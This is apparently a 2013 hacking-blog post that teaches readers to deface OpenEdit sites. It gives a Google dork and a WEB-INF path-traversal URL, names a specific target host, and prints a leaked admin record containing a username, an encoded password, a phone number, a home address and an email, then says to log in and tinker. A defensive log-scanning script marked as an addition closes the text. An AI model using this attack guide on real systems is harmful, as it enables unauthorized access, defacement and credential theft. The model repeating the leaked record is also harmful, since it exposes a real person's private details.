Posted by: Ham JavaNet, Saturday, 13 April 2013

Daffa-x207 here again :)
Let's get straight to it :v

[#] The dork:

Code:
inurl:openedit/authentication/

[#] The exploit:

Code:
/openedit/files/download/WEB-INF/users/admin.xml

No more talk.
Let's go straight into the step-by-step deface method.
If your deface works, don't forget the cendol.

========
[#] Step 1 
========
- Go to Google and enter the dork above. Feel free to explore variations of the dork yourself for better results.

========
[#] Step 2 
========
- Pick one of the targets from the Google results
Example: http://mcdev.openedit.com/

========
[#] Step 3
========
- Append the exploit path from above,
so that it looks like this:
http://mcdev.openedit.com/openedit/files/download/WEB-INF/users/admin.xml

========
[#] Step 4
========
- You will automatically download an XML file.
Once it has downloaded, open that XML file.

========
[#] Step 5
========
- Inside that XML file are the admin's username and password.
Here is an example I got from the target above:


<?xml version="1.0" encoding="UTF-8" ?> 
<user enabled="true">
  <user-name>admin</user-name> 
  <password>DES:en9gFy2YMf0=</password> 
  <creation-date>1145462580187</creation-date> 
  <properties>
  <property name="billingAddress1" value="kj" /> 
  <property name="billingAddress2" value="kllkj" /> 
  <property name="Phone1" value="512-788-6787" /> 
  <property name="addresslist" value="my house,Home" /> 
  <property name="TaxRate" value="0.0000" /> 
  <property name="billingState" value="LKJ" /> 
  <property name="ship2State" value="5" /> 
  <property name="BillingState" value="SOME STATE" /> 
  <property name="AllowEmail" value="false" /> 
  <property name="my houseAddress1" value="home street" /> 
  <property name="showopenjobs" value="false" /> 
  <property name="homeCity" value="sadf" /> 
  <property name="my houseCountry" value="USA" /> 
  <property name="showjobsearch" value="false" /> 
  <property name="ship2Country" value="5" /> 
  <property name="billingCity" value="lkj" /> 
  <property name="firstName" value="Admin" /> 
  <property name="billingCountry" value="klj" /> 
  <property name="Company" value="The Administrator" /> 
  <property name="BillingAddress1" value="adress line 1" /> 
  <property name="lastName" value="User" /> 
  <property name="BillingCountry" value="USA" /> 
  <property name="HomeCity" value="Cincinnati" /> 
  <property name="HomeCountry" value="USA" /> 
  <property name="oe.edit.mode" value="preview" /> 
  <property name="HomeState" value="OH" /> 
  <property name="ship2Address2" value="2" /> 
  <property name="homeCountry" value="sadf" /> 
  <property name="ship2Address1" value="3" /> 
  <property name="HomeAddress1" value="5052 Gray Rd" /> 
  <property name="ship2City" value="1" /> 
  <property name="openadmintoolbar" value="true" /> 
  <property name="showcategoryselection" value="false" /> 
  <property name="BillingCity" value="somewhere" /> 
  <property name="showassetmanager" value="false" /> 
  <property name="email" value="jvalencia@openedit.org" /> 
  <property name="failedlogincount" value="0" /> 
  <property name="showfilter" value="false" /> 
  <property name="homeState" value="SDF" /> 
  <property name="homeAddress2" value="sadf" /> 
  <property name="homeAddress1" value="fdsa" /> 
  <property name="showtodosearch" value="false" /> 
  <property name="showbasket" value="false" /> 
  <property name="HomeZipCode" value="45232" /> 
  </properties>
  <group id="greenbaydie" /> 
  <group id="administrators" /> 
  <group id="honda" /> 
  <group id="orderers" /> 
  </user> 


========
[#] Step 6
========
- Now the admin password is visible.
Just go ahead and log in here:
http://mcdev.openedit.com/openedit/filemanager


========
[#] Step 7
========
- Done, mission complete.
All that's left is to tinker as you please.
<password>DES:en9gFy2YMf0=</password>

The password shown in red needs nothing further done to it; just log in.
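
A defender-side check for the request pattern in the steps above, as an added example that is not part of the original post: it scans web server access logs for requests that reach WEB-INF through the /openedit/files/download/ path and separates those the server answered successfully from those it refused. The common/combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Common/combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
DOWNLOAD_PREFIX = "/openedit/files/download/"  # path taken from the post

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Apr/2013:10:01:02 +0000] "GET /openedit/files/download/WEB-INF/users/admin.xml HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [13/Apr/2013:10:01:09 +0000] "GET /openedit/files/download/%57EB-INF/users/admin.xml HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [13/Apr/2013:10:02:00 +0000] "GET /openedit/files/download/media/logo.png HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [13/Apr/2013:10:03:00 +0000] "GET /openedit//files/download/web-inf/users/admin.xml?x=1 HTTP/1.1" 404 0 "-" "curl/7"',
]


def normalize_path(target):
    """Drop the query string, decode percent-encoding, collapse slashes, lowercase."""
    path = target.split("?", 1)[0]
    for _ in range(2):  # second pass covers double-encoded input
        path = unquote(path)
    return re.sub(r"/{2,}", "/", path.replace("\\", "/")).lower()


def find_webinf_downloads(lines):
    """Return (served, attempted): requests reaching WEB-INF via the download path."""
    served, attempted = [], []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalize_path(m.group("target"))
        if not path.startswith(DOWNLOAD_PREFIX):
            continue
        if "web-inf" not in path[len(DOWNLOAD_PREFIX):].split("/"):
            continue
        hit = {"ip": m.group("ip"), "time": m.group("time"),
               "path": path, "status": int(m.group("status"))}
        (served if 200 <= hit["status"] < 300 else attempted).append(hit)
    return served, attempted


if __name__ == "__main__":
    served, attempted = find_webinf_downloads(SAMPLE_LOG)
    for hit in served:
        print("SERVED   ", hit["ip"], hit["time"], hit["path"])
    for hit in attempted:
        print("ATTEMPTED", hit["ip"], hit["status"], hit["path"])
```

An entry in `served` means the user file left the server, so the credentials stored in it should be treated as exposed and changed.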


- Copyright © 2013 shad0w-share | Designed by Johanes Djogan -